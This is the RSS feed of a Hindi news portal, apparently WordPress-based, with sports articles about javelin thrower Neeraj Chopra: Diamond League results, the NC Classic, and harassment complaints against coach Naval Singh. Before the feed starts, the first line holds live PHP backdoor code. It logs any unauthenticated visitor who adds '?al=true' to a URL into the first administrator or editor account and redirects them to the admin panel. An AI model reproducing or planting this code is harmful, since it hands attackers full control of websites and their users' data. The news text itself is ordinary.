// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Neeraj Chopra – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sat, 18 Apr 2026 06:26:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 नीरज चोपड़ा और सुमित अंतिल ने कोच नवल सिंह पर मानसिक उत्पीड़न और गालियों के आरोप लगाए https://pratyushaashakinayikiran.com/?p=212978 Sat, 18 Apr 2026 06:26:00 +0000 https://pratyushaashakinayikiran.com/?p=212978  नई दिल्ली

स्टार जैवलिन थ्रोअर नीरज चोपड़ा और पैरालंपिक गोल्ड मेडलिस्ट सुमित अंतिल ने द्रोणाचार्य अवॉर्ड विजेता कोच नवल सिंह पर मानसिक प्रताड़ना और गाली-गलौज के गंभीर आरोप लगाए हैं. सुमित अंतिल ने इस मामले की औपचारिक शिकायत भारतीय खेल प्राधिकरण (SAI) से की है. सुमित अंतिल का आरोप है कि कोच नवल सिंह लगातार उन्हें और नीरज चोपड़ा को मानसिक रूप से परेशान कर रहे थे. उन्होंने दावा किया कि नवल सिंह ने कई बार दोनों खिलाड़ियों के परिवारों को लेकर भी अपशब्द कहे। 

सुमित अंतिल ने समाचार एजेंसी पीटीआई से कहा, 'उन्होंने मुझे और नीरज भाई को मानसिक रूप से प्रताड़ित किया. हमारे परिवारों को लेकर गालियां दीं. वह मानसिक रूप से अस्थिर लगते हैं.' उन्होंने बताया कि नवल सिंह अक्सर अपने गुस्से और गाली-गलौज वाले ऑडियो रिकॉर्ड करते थे और उन्हें खिलाड़ियों के मैनेजरों को भेजते थे, ताकि वह उनके पास पहुंचें. सुमित के मुताबिक यह सिलसिला लंबे समय से चल रहा था, लेकिन जब मामला ज्यादा बढ़ गया तो उन्होंने शिकायत करने का फैसला किया। 

सुमित अंतिल ने आगे कहा, 'हमने लंबे समय तक इस मामले को नजरअंदाज किया, लेकिन जब यह बहुत ज्यादा हो गया तो शिकायत करनी पड़ी. मैंने शिकायत दर्ज कराई और नीरज भाई, नवदीप सिंह और संदीप चौधरी ने भी समर्थन किया.' SAI ने पुष्टि की है कि उसे शिकायत मिली है और मामले को संबंधित फेडरेशन के साथ उठाया जा रहा है. हालांकि SAI ने साफ किया कि नवल सिंह उसके कर्मचारी नहीं हैं. वह फिलहाल भारतीय एथलेटिक्स महासंघ (AFI) के राष्ट्रीय शिविर से जुड़े हुए हैं। 

सचिन यादव को ट्रेनिंग देते हैं नवल सिंह
SAI के एक अधिकारी ने कहा, सुमित अंतिल की ओर से कोच नवल सिंह के खिलाफ शिकायत मिली है. इस शिकायत का समर्थन नीरज चोपड़ा समेत अन्य खिलाड़ियों ने भी किया है.' नवल सिंह को साल 2015 में द्रोणाचार्य अवॉर्ड मिला था. वह फिलहाल सचिन यादव को ट्रेनिंग दे रहे हैं. सचिन यादव ने पिछले साल वर्ल्ड चैम्पियनशिप में चौथा स्थान हासिल किया था, जबकि चोट से जूझ रहे नीरज चोपड़ा आठवें स्थान पर रहे थे। 

सुमित अंतिल ने कहा कि शिकायत करने के बाद भी उन्हें अधिकारियों की तरफ से उम्मीद के मुताबिक प्रतिक्रिया नहीं मिली. उन्होंने कहा, 'अगर हमारे जैसे खिलाड़ियों की बात नहीं सुनी जाएगी, तो बाकी खिलाड़ी क्या उम्मीद करेंगे. शिकायत के बाद अभी तक कोई औपचारिक जवाब भी नहीं मिला है। 

उन्होंने यह भी दावा किया कि पहली सुनवाई के दौरान TOPS (टारगेट ओलंपिक पोडियम स्कीम) के अधिकारियों ने समझौता करने की बात कही थी. सुमित के मुताबिक, 'शिकायत किए हुए एक हफ्ता हो गया है. SAI के महानिदेशक और TOPS के CEO को भी बताया गया था, लेकिन पहली सुनवाई में समझौते की बात हुई। 

सुमित अंतिल ने नवल सिंह की मंशा पर भी सवाल उठाए. उन्होंने आरोप लगाया कि शायद कोच चाहते हैं कि नीरज चोपड़ा के मुकाबले सचिन यादव से बेहतर प्रदर्शन करें क्योंकि सचिन उन्हीं के साथ ट्रेनिंग करते हैं. इस पूरे मामले ने भारतीय एथलेटिक्स में खिलाड़ियों और कोचों के रिश्ते को लेकर नई बहस छेड़ दी है। 

]]>
नीरज चोपड़ा डायमंड लीग फाइनल में रहे रजत पदक विजेता, वेबर बने चैम्पियन https://pratyushaashakinayikiran.com/?p=181526 Fri, 29 Aug 2025 08:16:00 +0000 https://pratyushaashakinayikiran.com/?p=181526 ज्यूरिख

भारत के स्टार भाला फेंक (जैवलिन थ्रो) खिलाड़ी नीरज चोपड़ा ने स्विट्जरलैंड के ज्यूरिख में हुए डायमंड लीग फाइनल में दूसरा स्थान हासिल किया. नीरज का फाइनल में बेस्ट थ्रो 85.01 मीटर रहा. जर्मनी के जूलियन वेबर चैम्पियन बनने में कामयाब रहे. वेबर का बेस्ट थ्रो 91.51 मीटर रहा. मौजूदा वर्ल्ड चैम्पियन नीरज ने 2022 में डायमंड लीग फाइनल जीतकर डायमंड ट्रॉफी अपने नाम की थी. जबकि 2023 और 2024 में नीरज दूसरे स्थान पर रहे थे.

फाइनल में नीरज चोपड़ा का पहला प्रयास कुछ खास नहीं रहा और वो 84.35 का ही थ्रो कर पाए. दूसरी ओर जर्मनी के जूलियन वेबर ने 91.37 मीटर का थ्रो करके लीड बना ली. वेबर ने दूसरा थ्रो और जबरदस्त किया और उसमें उन्होंने 91.51 मीटर की दूरी हासिल की. यानी वेबर ने अपने पर्सनल बेस्ट में फिर सुधार किया. दूसरी ओर नीरज का दूसरा थ्रो कुछ खास नहीं रहा और वो 82.00 मीटर की दूरी ही हासिल कर पाए.

नीरज चोपड़ा का तीसरा अटेम्प्ट फाउल रहा. भारतीय खिलाड़ी से उम्मीद थी कि वो चौथे प्रयास में अच्छा करेंगे, लेकिन इस बार भी नीरज ने फाउल किया. नीरज का पांचवां प्रयास भी बेकार गया. यानी वो फिर फाउल कर बैठे. छठे प्रयास में नीरज ने कुछ जोर लगाया जिसके चलते वो केशोर्न वाल्कॉट को पछाड़ दूसरे स्थान पर पहुंचे. नीरज ने आखिरी प्रयास में 85.01 मीटर का थ्रो किया, जो उनका इस फाइनल में बेस्ट थ्रो रहा.

नीरज चोपड़ा का डायमंड लीग फाइनल प्रदर्शन:
पहला प्रयास: 84.35 मीटर
दूसरा प्रयास: 82.00 मीटर
तीसरा प्रयास: फाउल
चौथा प्रयास: फाउल
पांचवां प्रयास: फाउल
छठा प्रयास: 85.01 मीटर

फाइनल में सभी 7 खिलाड़ियों के बेस्ट थ्रो-
1. जूलियन वेबर (जर्मनी): 91.51 मीटर
2. नीरज चोपड़ा (भारत): 85.01 मीटर
3. केशोर्न वाल्कॉट (त्रिनिदाद एंड टोबैगो): 84.95 मीटर
4. एंडरसन पीटर्स (ग्रेनाडा): 82.06 मीटर
5. जूलियस येगो (केन्या): 82.01 मीटर
6. एंड्रियन मर्डारे (मोल्दोवा): 81.81 मीटर
7. साइमन वीलैंड (स्विट्जरलैंड): 81.29 मीटर

diamond leagueनीरज चोपड़ा ने इस सीजन में दो डायमंड लीग प्रतियोगिताओं में भाग लिया. दोहा लेग में नीरज ने अपने करियर का बेस्ट थ्रो (90.23 मीटर) किया, लेकिन वो दूसरे स्थान पर रहे थे. फिर पेरिस लेग में 88.16 मीटर के थ्रो के साथ नीरज ने जीत हासिल की. फाइनल में अपनी जगह पक्की करने के बाद नीरज ने सिलेसिया और ब्रुसेल्स लेग से बाहर रहने का विकल्प चुना. 

नीरज चोपड़ा ने कुल 15 अंकों के साथ डायमंड लीग फाइनल में जगह बनाई. डायमंड लीग के किसी लेग में पहले स्थान पर रहने के लिए 8 प्वाइंट्स, दूसरे स्थान पर रहने के लिए 7 अंक, तीसरे स्थान पर रहने के लिए 6 प्वाइंट्स और चौथे स्थान पर रहने के लिए 5 अंक दिए जाते हैं.

डायमंड लीग फाइनल में विजेता को क्या मिलता है?
डायमंड लीग फाइनल के विजेता को डायमंड ट्रॉफी म‍िलती है. साथ ही उसे 30 हजार डॉलर से पचास हजार डॉलर तक की इनामी राशि मिलती है. इसके अलावा वर्ल्ड एथलेटिक्स चैम्पियनशिप के लिए उसे वाइल्ड कार्ड भी मिलता है. कुल मिलाकर नीरज चोपड़ा ने डायमंड लीग फाइनल से पहले छह टूर्नामेंट्स में भाग लिया. इनमें से चार में उन्होंने जीत हासिल की है, जबकि दो में दूसरे स्थान पर रहे.

डायमंड लीग फाइनल के बाद अब नीरज चोपड़ा की निगाहें अगले महीने होने वाली वर्ल्ड एथलेटिक्स चैम्पियनशिप 2025 पर टिकी हैं, जहां वो अपने खिताब का बचाव करना चाहेंगे. बता दें कि वर्ल्ड एथलेटिक्स चैम्पियनशिप 13 से 21 सितंबर तक जापान की राजधानी टोक्यो में आयोजित की जाएगी.

]]>
आज नीरज चोपड़ा द‍िखाएंगे जैवल‍िन थ्रो में दम, इन 8 ख‍िलाड़‍ियों से होगी कड़ी टक्कर, जानें कब होगा मुकाबला https://pratyushaashakinayikiran.com/?p=168690 Sat, 05 Jul 2025 07:16:00 +0000 https://pratyushaashakinayikiran.com/?p=168690 बेंगलुरु

नीरज चोपड़ा शनिवार (5 जुलाई) को बेंगलुरु में एनसी क्लासिक (NC Classic) भाला फेंक (Javelin throw) प्रतियोगिता में कुछ चिरपरिचित प्रतिद्वंद्वियों के खिलाफ उतरेंगे. वह इस साल दूसरी बार 90 मीटर की दूरी पार करने की कोशिश करेंगे. यह इवेंट शाम 6.30 बजे शुरू होगा.  

27 साल के नीरज चोपड़ा अब तक लगभग सभी प्रमुख खिताब जीत चुके हैं. ओलंपिक और विश्व चैम्पिनशिप के स्वर्ण पदक, डायमंड लीग फाइनल्स ट्रॉफी, एशियन गेम्स और कॉमनवेल्थ गेम्स के स्वर्ण पदक उनकी सफलताओं की कहानी कहते हैं. 

नीरज चोपड़ा क्लासिक का पहला संस्करण केवल खेल में सफलता हासिल करने तक सीमित नहीं है, यह भारतीय प्रशंसकों को शीर्ष-स्तरीय प्रतियोगिता को व्यक्तिगत रूप से देखने का मौका दे रहा है, जो देश में खेल की प्रतिष्ठा बढ़ाने में मदद करेगा.

वह विश्व रिकार्डधारी स्वीडिश पोल वॉल्टर आर्मंड डुप्लांटिस और केन्या के दिग्गज धावक किपचोगे कीनो से प्रेरित हैं, जिनके नाम पर 'मोंडो क्लासिक' और 'किप केइनो क्लासिक; जैसे अंतरराष्ट्रीय आयोजन होते हैं, जो विश्व एथलेटिक्स कॉन्टिनेंटल टूर का हिस्सा हैं.

कांतीरावा स्टेडियम में होने वाली प्रतियोगिता के दौरान प्रशंसकों को इस डबल ओलंपिक पदक विजेता को एक्शन में देखने का मौका मिलेगा. मई में दोहा में पहली बार 90 मीटर से अधिक थ्रो करने वाले नीरज फिर से वैसी ही दूरी हासिल करने की कोशिश करेंगे. वह एक साल के अंतराल के बाद भारत में प्रतिस्पर्धा कर रहे हैं.

टोक्यो ओलंपिक में भारत को एथलेटिक्स में पहला स्वर्ण पदक दिला चुके हरियाणा के खांदरा गांव के इस धुरंधर एथलीट ने कहा, 'इस तरह की प्रतियोगिता भारत में आयोजित करना मेरा एक सपना था जो अब पूरा हो रहा है.मैं बहुत उत्साहित हूं. मैंने देश के लिए ओलंपिक और अन्य पदक जीते हैं. अब इस आयोजन के माध्यम से मैं भारतीय एथलेटिक्स, खिलाड़ियों और प्रशंसकों को कुछ वापस दे रहा हूं.'

इस प्रतियोगिता का आयोजन नीरज चोपड़ा JSW स्पोर्ट्स, भारतीय एथलेटिक्स महासंघ (AFI) और विश्व एथलेटिक्स के साथ मिलकर कर रहे हैं. नीरज ने कहा कि एनसी क्लासिक हर साल आयोजित किया जाएगा और भविष्य में इसमें भाले के अलावा अन्य खेलों को भी जोड़ा जाएगा.

पहले यह कार्यक्रम 24 मई को पंचकूला (हरियाणा) में होना था, लेकिन अंतरराष्ट्रीय प्रसारकों के लिए आवश्यक अपर्याप्त प्रकाश व्यवस्था के कारण इसे बेंगलुरु में स्थानांतरित कर दिया गया. पहलगाम आतंकी हमले के बाद भारत और पाकिस्तान के बीच सैन्य संघर्ष के कारण इस कार्यक्रम को बाद में स्थगित कर दिया गया था. 

यह भारत में आयोजित होने वाली सबसे हाई-प्रोफाइल एकल स्पर्धा अंतरराष्ट्रीय एथलेटिक्स प्रतियोगिता होगी, जिसे विश्व एथलेटिक्स ने कैटेगरी ए का दर्जा दिया है.

हालांकि कुछ खिलाड़ियों की गैरमौजूदगी से प्रतियोगिता की रौनक जरूर कम हुई है. दो बार के विश्व चैम्पियन एंडरसन पीटर्स (ग्रेनेडा) चोट के चलते बाहर हो गए हैं, लेकिन नीरज की लोकप्रियता से स्टेडियम पूरा भरने की उम्मीद है.

12 खिलाड़ियों की प्रतिस्पर्धा अभी भी विश्वस्तरीय है, जिनमें से 5 पहले ही इस साल टोक्यो में होने वाली विश्व चैम्पिनशिप के लिए क्वालिफाई कर चुके हैं.

नीरज के कोच और विश्व रिकॉर्डधारी जान जेलेज्नी भी शहर में पहुंच चुके हैं और भारतीय प्रशंसकों को इस दिग्गज को देखने का अवसर मिलेगा.

प्रतियोगिता में नीरज सबसे प्रबल दावेदार हैं. जूलियन वेबर भाग नहीं ले रहे हैं और पीटर्स भी बाहर हो गए हैं. इन दोनों ने इस सीजन में नीरज को सबसे कड़ी टक्कर दी थी. जर्मनी के वेबर ने नीरज को दो बार हराया था, लेकिन पेरिस डायमंड लीग में नीरज ने उन्हें पछाड़ दिया. पीटर्स दो बार तीसरे स्थान पर रहे.

पाकिस्तान के ओलंपिक चैम्पियन अरशद नदीम को भी आमंत्रित किया गया था, लेकिन उन्होंने अपने ट्रेनिंग शेड्यूल का हवाला देते हुए मना कर दिया.

नीरज को चुनौती देने वाले अन्य प्रमुख खिलाड़ी हैं –

थॉमस रोहलर (जर्मनी, व्यक्तिगत सर्वश्रेष्ठ: 93.90 मीटर)

जूलियस येगो (केन्या, व्यक्तिगत सर्वश्रेष्ठ: 92.72 मीटर)

कर्टिस थॉम्पसन (अमेरिका, व्यक्तिगत सर्वश्रेष्ठ: 87.76 मीटर)

हालांकि रोहलर और येगो हाल के दिनों में अच्छी फॉर्म में नहीं हैं.

अन्य विदेशी प्रतिभागी हैं- 

मार्टिन कोनेक्नी (चेक गणराज्य – PB: 80.59 मीटर)

लुइज मौरिसियो डा सिल्वा (ब्राजील – PB: 86.62 मीटर)

रमेश पथिरगे (श्रीलंका – PB: 85.45 मीटर)

सायप्रियन मर्जीग्लोड (पोलैंड – PB: 85.92 मीटर)

चार अन्य भारतीय खिलाड़ियों में सचिन यादव बेहतरीन फॉर्म में हैं और हाल ही में एशियन चैम्पियनशिप में रजत पदक जीत चुके हैं. चोटिल किशोर जेना की जगह लेने वाले यशवीर सिंह एशियाई चैम्पियनशिप में 5वें स्थान पर रहे.अन्य दो भारतीय खिलाड़ी रोहित यादव (2023 विश्व चैम्पियनशिप में भाग ले चुके हैं) और साहिल सिलवाल हैं.

इन सभी के लिए एनसी क्लासिक महत्वपूर्ण होगा क्योंकि वे न केवल कुछ शीर्ष थ्रोअरों के साथ प्रतिस्पर्धा करेंगे, बल्कि 85.50 मीटर के सीधे प्रवेश मानक को पार करके इस वर्ष की विश्व चैम्पियनशिप के लिए अर्हता प्राप्त कर सकते हैं या विश्व रैंकिंग कोटा के माध्यम से विश्व चैम्पियनशिप में जगह बनाने के लिए मूल्यवान अंक प्राप्त कर सकते हैं.

नीरज चोपड़ा – 2025 सीजन प्रदर्शन

16 अप्रैल – पोट्च इनविटेशनल मीट (दक्षिण अफ्रीका)- पहला स्थान, 84.52 मीटर

16 मई – दोहा डायमंड लीग (कतर)– दूसरा स्थान, 90.23 मीटर (बेस्ट)

23 मई – यानुज कुशोचिंस्की मेमोरियल (पोलैंड) – दूसरा स्थान, 84.14 मीटर

20 जून – पेरिस डायमंड लीग (फ्रांस) पहला स्थान, 88.16 मीटर

24 जून – ओस्ट्रावा गोल्डन स्पाइक (चेक गणराज्य) – पहला स्थान, 85.29 मीटर

]]>
नीरज चोपड़ा ने जीती पेरिस डायमंड लीग, 88.16 मीटर किया थ्रो, लिया जूलियन वेबर से बदला… https://pratyushaashakinayikiran.com/?p=165462 Sat, 21 Jun 2025 06:06:00 +0000 https://pratyushaashakinayikiran.com/?p=165462 पेरिस 

भारत के स्टार जेवलिन खिलाड़ी नीरज चोपड़ा ने एक बार फिर गोल्ड पर निशाना लगाया है। पेरिस डायमंड लीग 2025 की मेन्स जैवलिन थ्रो इवेंट में भारत के गोल्डेन बॉय ने कमाल कर दिया है। पेरिस में हुए डायमंड लीग 2025 के जेवलिन थ्रो इवेंट के रोमांचक मुकाबले के बाद नीरज ने नंबर वन का स्थान अपने नाम किया। नीरज ने खिताब को अपने नाम किया और जर्मनी के जूलियन वेबर से पिछली हार का बदला भी लिया।

बता दें कि नीरज ने अपने पहले ही प्रयास में 88.16 मीटर का जबरदस्त थ्रो कर पहला स्थान हासिल किया। वहीं जर्मनी के जूलियन वेबर ने 87.88 मीटर का थ्रो किया और वह दूसरे स्थान पर रहे। ब्राजील के मौरिसियो लुइज दा सिल्वा 86.62 मीटर की थ्रो के साथ तीसरे स्थान पर रहे।

नीरज ने पहले ही थ्रो में किया कमाल

बता दें कि ओलंपिक में दो बार पदक जीत चुके नीरज चोपड़ा ने पेरिस डायमंड लीग 2025 में पहले ही थ्रो में 88.16 मीटर की दूरी तय कर शानदार शुरुआत की। इसके बाद उन्होंने 85.10 मीटर का थ्रो किया, जबकि उनके तीन प्रयास फाउल रहे। हालांकि, उनका पहला थ्रो ही उन्हें पहले स्थान पर बनाए रखने के लिए काफी रहा। जर्मनी के जूलियन वेबर ने दिन की शुरुआत में ही 87.88 मीटर का थ्रो किया, लेकिन वह नीरज को पछाड़ नहीं सके और दूसरे स्थान पर रहे। ब्राज़ील के मौरिसियो लुइज़ दा सिल्वा ने तीसरे थ्रो में 86.62 मीटर फेंककर तीसरा स्थान हासिल किया, जबकि केशोर्न वाल्कोट ने 81.66 मीटर के प्रयास के साथ चौथा स्थान पाया।

पेरिस डायमंड लीग में क्या हुआ?

चोपड़ा ने पहले ही प्रयास में 88.16 मीटर भाला फेंककर बढ़त बना ली। जर्मनी के जूलियन वेबर 87.88 मीटर भाला फेंकने के करीब पहुंचे, लेकिन चूक गए। ब्राजील के मौरिसियो लुईज दा सिल्वा ने 86.62 मीटर भाला फेंककर तीसरा स्थान हासिल किया।

पहले राउंड में चोपड़ा ने बढ़त बनाई, उसके बाद वेबर ने 87.88 मीटर और त्रिनिदाद और टोबैगो के केशोर्न वाल्कोट ने 80.94 मीटर का थ्रो किया। दूसरे राउंड में वेबर ने 86.20 मीटर थ्रो किया, जबकि नीरज ने 85.10 मीटर और वाल्कोट ने थोड़ा सुधार करते हुए 81.66 मीटर थ्रो किया। हालांकि, चोपड़ा का शुरुआती थ्रो बेजोड़ रहा।

पेरिस डायमंड लीग में नीरज चोपड़ा का प्रदर्शन 

    पहला प्रयास- 88.16 मी
    दूसरा प्रयास- 85.10 मी
    तीसरा प्रयास- फाउल
    चौथा प्रयास- फाउल
    पांचवां प्रयास- फाउल
    छठा प्रयास- 82.89 मीटर

पेरिस डायमंड लीग में सभी 8 खिलाड़ियों के सर्वश्रेष्ठ थ्रो

    नीरज चोपड़ा (भारत)- 88.16 मी
    जूलियन वेबर (जर्मनी)- 87.88 मी
    लुईज मौरिशियो डा सिल्वा (ब्राजील)- 86.62 मी
    केशोर्न वाल्कॉट (त्रिनिदाद एंड टोबैगो)- 81.66 मी
    एंडरसन पीटर्स (ग्रेनाडा)- 80.29 मी
    जूलियस येगो (केन्या)- 80.26 मी
    एड्रियन मर्डारे (मोलडोवा)- 76.66 मी
    रेमी रूजेटे (फ्रांस)- 70.37 मी

16 मई को दोहा डायमंड लीग 2025 में जूलियन वेबर ने नीरज चोपड़ा को हराया था. तब जूलियन वेबर ने आखिरी थ्रो 91.06 मीटर का फेंककर पहला स्थान हासिल किया था. वहीं नीरज 90.23 मीटर के थ्रो के साथ दूसरे नंबर पर रहे थे. फिर वेबर ने 23 मई को पोलैंड में आयोजित जानुज कुसोसिंकी मेमोरियल स्पर्धा में भी नीरज को हराया था. जानुज कुसोसिंकी मेमोरियल स्पर्धा में वेबर ने 86.12 मीटर और नीरज ने 84.14 मीटर का थ्रो किया फेंका.

गोल्डन बॉय की शानदार वापसी

नीरज चोपड़ा ने इस साल की शुरुआत दक्षिण अफ्रीका में पोच टूर्नामेंट में 84.52 मीटर की थ्रो के साथ जीत से की थी, लेकिन इसके बाद दोहा और जानुस कुसोसिन्स्की मेमोरियल में उन्हें जर्मनी के जूलियन वेबर से पीछे रहना पड़ा। दोहा में वह दो बार दूसरे स्थान पर रहे और जानुस में उनका थ्रो 84.14 मीटर रहा। हालांकि, पेरिस डायमंड लीग में उन्होंने शानदार वापसी की और अपने पहले ही प्रयास में बढ़त बनाकर मुकाबला जीत लिया। यह जीत नीरज की इस साल की पहली बड़ी उपलब्धि बनी, जिसमें उन्होंने अपने पुराने राइवल जूलियन वेबर को पीछे छोड़ दिया।

पिछले दो मुकाबले में वेबर ने दी थी मात

बता दें इससे पहले 16 मई 2025 को दोहा में आयोजित डायमंड लीग में जूलियन वेबर ने नीरज चोपड़ा को कड़े मुकाबले में 91.06 मीटर का थ्रो पहले स्थान पर रहें, जबकि नीरज 90.23 मीटर के थ्रो के साथ दूसरे स्थान पर रहे। इसके बाद 23 मई को पोलैंड में हुए जानुज कुसोसिंकी मेमोरियल टूर्नामेंट में भी वेबर ने बाजी मारी। उस मुकाबले में वेबर ने 86.12 मीटर और नीरज ने 84.14 मीटर की दूरी तय की। दोनों ही मुकाबलों में जर्मन एथलीट वेबर नीरज पर भारी पड़े।

]]>
नीरज चोपड़ा आज सितारों से भरी पेरिस डायमंड लीग में भारत की चुनौती पेश करेंगे https://pratyushaashakinayikiran.com/?p=165185 Fri, 20 Jun 2025 07:26:00 +0000 https://pratyushaashakinayikiran.com/?p=165185 लंदन 

दो बार के ओलंपिक पदक विजेता नीरज चोपड़ा शुक्रवार को सितारों से भरी पेरिस डायमंड लीग में भारत की चुनौती पेश करेंगे. वह डायमंड लीग के पेरिस चरण में 8 साल बाद खेलेंगे. डायमंड लीग के दूसरे चरण में भालाफेंक स्पर्धा में चोपड़ा के साथ जर्मनी के जूलियन वेबर, दो बार के विश्व चैम्पियन ग्रेनाडा के एंडरसन पीटर्स भी 8 दावेदारों में होंगे. नीरज चोपड़ा का मुकाबला देर रात 1 बजकर 12 मिनट पर शुरू होगा.

जूलियन वेबर ने 16 मई को दोहा डायमंड लीग में नीरज चोपड़ा को हराया था. दोहा में नीरज ने 90 मीटर से ऊपर का थ्रो फेंका था. जूलियन वेबर ने आखिरी थ्रो 91.06 मीटर का फेंककर पहला स्थान हासिल किया. चोपड़ा 90.23 मीटर के थ्रो के साथ दूसरे स्थान पर रहे थे.

31 साल के वेबर ने 23 मई को पोलैंड में जानुज कुसोसिंकी मेमोरियल स्पर्धा में भी नीरज को हराया था. वेबर ने 86.12 मीटर और चोपड़ा ने 84.14 मीटर का थ्रो फेंका था. पीटर्स दोनों में तीसरे स्थान पर रहे थे. पेरिस में चोपड़ा की नजरें वेबर से पिछली दोनों हार का बदला चुकता करने की होगी.

नीरज ने पिछले साल ओलंपिक पर फोकस करने के लिए पेरिस डायमंड लीग में भाग नहीं लिया. पेरिस ओलंपिक में 89.45 मीटर के थ्रो के साथ उन्होंने सिल्वर मेडल जीता था. आखिरी बार उन्होंने 2017 में पेरिस डायमंड लीग में जूनियर विश्व चैम्पियन के तौर पर खेलकर 5वां स्थान हासिल किया था.

चोपड़ा और वेबर के अलावा पीटर्स भी 2022 में 90 मीटर की बाधा पार कर चुके हैं . केन्या के 2015 विश्व चैम्पियन जूलियस येगो और त्रिनिदाद और टोबैगो के 2012 ओलंपिक गोल्ड मेडल विजेता केशोर्न वाल्कॉट भी 90 मीटर क्लब में शामिल हैं, जिन्होंने 2015 में यह कारनामा किया था.

इनके अलावा पेरिस डायमंड लीग में ब्राजील के लुईज मौरिशियो डा सिल्वा, मोलडोवा के एड्रियन मारडारे और फ्रांस के रेमी रूजेटे भी भाग लेंगे. पेरिस डायमंड लीग के बाद चोपड़ा 24 जून से चेक गणराज्य के ओस्ट्रावा में गोल्डन स्पाइक एथलेटिक्स मीट में भाग लेंगे. इसके बाद वह 5 जुलाई को बेंगलुरू में नीरज चोपड़ा क्लासिक में उतरेंगे.

 

]]>
नीरज चोपड़ा ने अब जीता सिल्वर, जर्मनी के जूलियन वेबर को गोल्ड https://pratyushaashakinayikiran.com/?p=158653 Sat, 24 May 2025 07:26:00 +0000 https://pratyushaashakinayikiran.com/?p=158653 चोरजो
भारत के स्टार भाला फेंक खिलाड़ी नीरज चोपड़ा पोलैंड में आयोजित ओरलेन जानुस कुसोसिन्स्की मेमोरियल प्रतियोगिता की पुरुष भाला फेंक स्पर्धा में शुक्रवार को यहां जर्मनी के जूलियन वेबर के पीछे दूसरे स्थान पर रहे। चोपड़ा इस स्पर्धा में अपनी सर्वश्रेष्ठ लय में नहीं दिखे। 27 साल का यह खिलाड़ी अंतिम दौर से पहले तीसरे स्थान पर था। उन्होंने अपने छठे और अंतिम प्रयास में अपना भाला 84.14 मीटर की दूरी पर फेंका और दूसरे स्थान पर पहुंच गए।

नीरज चोपड़ा ने इससे पहले अपने दूसरे और पांचवें प्रयास में क्रमशः 81.28 मीटर और 81.80 मीटर की दूरी तय की। उनके अन्य तीन प्रयास फाउल थे। प्रतियोगिता का आयोजन सिलेसियन स्टेडियम में दिन में हुई बारिश के बाद आसमान में बादल छाए रहने के बीच किया गया।

हाल ही में (16 मई) दोहा डायमंड लीग में 90 मीटर स्पर्धा में चोपड़ा को हराकर शीर्ष स्थान हासिल करने वाले जर्मनी के जूलियन वेबर दूसरे दौर में 86.12 मीटर की दूरी के थ्रो के साथ फिर से शीर्ष स्थान पर रहे। दो बार के विश्व चैंपियन ग्रेनेडा के एंडरसन पीटर्स 83.24 मीटर के सर्वश्रेष्ठ थ्रो के साथ तीसरे स्थान पर रहे। वह दोहा में भी तीसरे स्थान पर रहे थे।

जूलियन वेबर: 86.12 मीटर
नीरज चोपड़ा: 84.14 मीटर
एंडरसन पीटर्स: 83.24 मीटर

यह भुवनेश्वर में 2024 फेडरेशन कप में 82.27 मीटर के प्रयास के बाद पहली बार है जब चोपड़ा ने किसी स्पर्धा में 85 मीटर से कम का सर्वश्रेष्ठ थ्रो दर्ज किया था। चोपड़ा ने दोहा डायमंड लीग में 90.23 मीटर दूर तक भाला फेंका। यह पहली बार था जब चोपड़ा ने किसी स्पर्धा में 90 मीटर से अधिक की दूरी तय की थी। दोहा में भी चोपड़ा वेबर (91.06 मीटर) के बाद दूसरे स्थान पर थे।

]]>
नीरज चोपड़ा ने पार किया 90 मीटर का बैरियर, दोहा डायमंड लीग में दूसरे नंबर पर रहे https://pratyushaashakinayikiran.com/?p=156882 Sat, 17 May 2025 05:36:00 +0000 https://pratyushaashakinayikiran.com/?p=156882 दोहा

 भारत के स्टार जैवलिन थ्रोअर नीरज चोपड़ा शुक्रवार (16 मई) को दोहा डायमंड लीग 2025 में उतरे. दोहा डायमंड लीग में नीरज ने मेन्स जैवलिन थ्रो स्पर्धा में दूसरा स्थान हासिल किया. नीरज ने तीसरे प्रयास में 90.23 मीटर का बेस्ट थ्रो किया. जर्मनी के जूलियन वेबर 91.06 मीटर के थ्रो के साथ पहले नंबर पर रहे. यह थ्रो वेबर ने छठे प्रयास में किया था. नीरज के अलावा उनके हमवतन किशोर जेना भी मेन्स जैवलिन थ्रो सपर्धा में भाग ले रहे थे, जो आठवें नंबर पर रहे.

बता दें कि डायमंड लीग के एक लेग में पहले स्थान पर रहने के लिए एथलीट को 8 अंक मिलते हैं. जबकि दूसरे स्थान पर रहने के लिए 7, तीसरे स्थान पर रहने के लिए 6 और चौथे स्थान पर रहने के लिए 5 अंक दिए जाते हैं. यानी नीरज चोपड़ा को 7, जबकि वेबर को 8 अंक मिले. डायमंड लीग 2025 का समापन 27 और 28 सितंबर को ज्यूरिख में डायमंड लीग फाइनल के साथ होना है. डायमंड लीग फाइनल के विजेता को डायमंड ट्रॉफी मिलती है.

 नीरज चोपड़ा के कीर्तिमान की तारीफ, बोले- भारत को गर्व है
नीरज चोपड़ा ने शुक्रवार (16 मई) को दोहा डायमंड लीग 2025 में 90 मीटर का बैर‍ियर पार कर दिया. जैवल‍िन थ्रो इवेंट में दूसरा स्थान हास‍िल करने के बावजूद नीरज ने इत‍िहास रच द‍िया. नीरज की इस उपलब्धि पर प्रधानमंत्री मोदी ने उनकी जमकर तारीफ की. पीएम मोदी ने नीरज की मेहनत और उनके अनुशासन का भी ज‍िक्र अपने पोस्ट में क‍िया.

नीरज ने पहली बार पार किया 90 मीटर का बैरियर

दोहा डायमंड लीग में नीरज चोपड़ा का पहला अटेम्प शानदार रहा और उन्होंने 88.44 मीटर का थ्रो किया. वहीं नीरज का दूसरा अटेम्प फाउल रहा. नीरज का तीसरा अटेम्प 90.23 मीटर का रहा. पहली बार नीरज ने अपने करियर में 90 मीटर का बैरियर पार किया. देखा जाए तो पहली बार किसी भारतीय खिलाड़ी ने 90 मीटर की दूरी पारी की है. यानी नीरज ने जैवलिन थ्रो में नेशनल रिकॉर्ड बना दिया.

